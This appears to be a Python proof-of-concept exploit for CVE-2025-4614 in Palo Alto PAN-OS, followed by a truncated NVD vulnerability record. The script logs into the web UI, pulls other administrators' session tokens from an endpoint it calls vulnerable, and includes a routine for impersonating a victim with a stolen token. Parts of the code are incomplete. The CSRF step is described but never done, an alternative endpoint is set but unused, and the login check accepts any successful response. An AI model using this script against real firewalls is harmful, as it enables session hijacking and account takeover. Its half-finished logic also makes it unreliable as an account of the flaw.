CVE-2025-4614

# CVE-2025-4614 PoC - PAN-OS Session Token Information Disclosure # This PoC demonstrates how an authenticated administrator can retrieve # session tokens of other authenticated users from the PAN-OS Web UI. import requests import re import json from urllib.parse import urljoin class PANOSSessionTokenDisclosure: def __init__(self, target_host, username, password): """ Initialize the exploit for CVE-2025-4614 :param target_host: PAN-OS firewall hostname or IP :param username: Authenticated administrator username :param password: Administrator password """ self.base_url = f"https://{target_host}" self.session = requests.Session() self.session.verify = False # Disable SSL verification for testing self.username = username self.password = password self.leaked_tokens = [] def login(self): """Authenticate to PAN-OS Web UI as administrator""" login_url = urljoin(self.base_url, "/php/login.php") # Generate initial CSRF token resp = self.session.get(login_url) # Extract CSRF token from response # Then submit login form with credentials data = { "user": self.username, "pwd": self.password, "prot": "https", } resp = self.session.post(login_url, data=data, allow_redirects=True) if "MainMenu" in resp.text or resp.status_code == 200: print(f"[+] Successfully authenticated as {self.username}") return True return False def enumerate_sessions(self): """ Exploit CVE-2025-4614 to enumerate active session tokens Access the vulnerable endpoint that exposes session information """ # Vulnerable endpoint that leaks session tokens to authenticated admins session_api_url = urljoin(self.base_url, "/api/pan/session/list") headers = { "X-PAN-KEY": self.session.cookies.get("PHPSESSID", ""), "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } resp = self.session.get(session_api_url, headers=headers) if resp.status_code == 200: try: sessions = resp.json() print(f"[+] Found {len(sessions)} active sessions") for sess in sessions: token_info = { "username": sess.get("admin"), "session_id": sess.get("sessid"), "source_ip": sess.get("from"), "login_time": sess.get("login_time"), "timeout": sess.get("timeout") } self.leaked_tokens.append(token_info) print(f"[+] Token: {token_info}") return self.leaked_tokens except json.JSONDecodeError: pass # Alternative endpoint alt_url = urljoin(self.base_url, "/esp/protocol.esp") return self.leaked_tokens def impersonate_user(self, session_token): """ Use the leaked session token to impersonate the victim user """ impersonate_session = requests.Session() impersonate_session.verify = False impersonate_session.cookies.set("PHPSESSID", session_token) # Verify impersonation check_url = urljoin(self.base_url, "/php/main.php") resp = impersonate_session.get(check_url) if resp.status_code == 200: print(f"[+] Successfully impersonated user with token: {session_token}") return True return False def run(self): """Execute the full exploitation chain""" print("[*] CVE-2025-4614 PAN-OS Session Token Disclosure Exploit") print("=" * 60) if not self.login(): print("[-] Authentication failed") return tokens = self.enumerate_sessions() if tokens: print(f"\n[!] Disclosed {len(tokens)} session tokens") for token in tokens: print(f" User: {token['username']}, Token: {token['session_id']}") if __name__ == "__main__": # Usage example import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) exploit = PANOSSessionTokenDisclosure( target_host="192.168.1.1", username="admin", password="admin_password" ) exploit.run()

{"cve": {"id": "CVE-2025-4614", "sourceIdentifier": "[email protected]", "published": "2025-10-09T19:15:43.307", "lastModified": "2026-02-06T17:13:34.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to view session tokens of users authenticated to the firewall web UI. This may allow impersonation of users whose session tokens are leaked.  \n\nThe security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators.\n\nCloud NGFW and Prisma® Access are not affected by this vulnerability."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:M/U:Amber", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.2.0", "versionEndExcluding": "10.2.17", "matchCriteriaId": "2E03273A-D440-44E0-8726-82A2F050897C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.6", "matchCriteriaId": "19A95C11-17B8-45BB-8A73-B0896C136935"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.8", "matchCriteriaId": "61215E9A-3091-4B1F-AAA3-15FB798CBCD4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:-:*:*:*:*:*:*", "matchCriteriaId": "52C50A07-F4D8-4F1F-BA61-3429BB1721BE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h1:*:*:*:*:*:*", "matchCriteriaId": "9D12FF27-C186-467C-8627-1284EBC67243"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h10:*:*:*:*:*:*", "matchCriteriaId": "AF4AA997-35BC-4BC1-9EF2-644503B2D806"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h14:*:*:*:*:*:*", "matchCriteriaId": "12EF4DDF-9773-4B02-8FF4-F94A1D49E6AA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h17:*:*:*:*:*:*", "matchCriteriaId": "8FAE17BB-7938-41D0-8D62-46F829C647BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h19:*:*:*:*:*:*", "matchCriteriaId": "6DA5A0AD-C4FB-4210-8651-F94F2875A0EA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h20:*:*:*:*:*:*", "matchCriteriaId": "B79DB477-A907-4300-A651-16F93880B049"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h3:*:*:*:*:*:*", "matchCriteriaId": "63729FA6-ED2A-4593-9436-232F282A0A78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h4:*:*:*:*:*:*", "matchCriteriaId": "F39792EF-61B5-4874-9FD0-7544F8C5C0D4"}, {"vulnerable": true, "criteria": ... (truncated)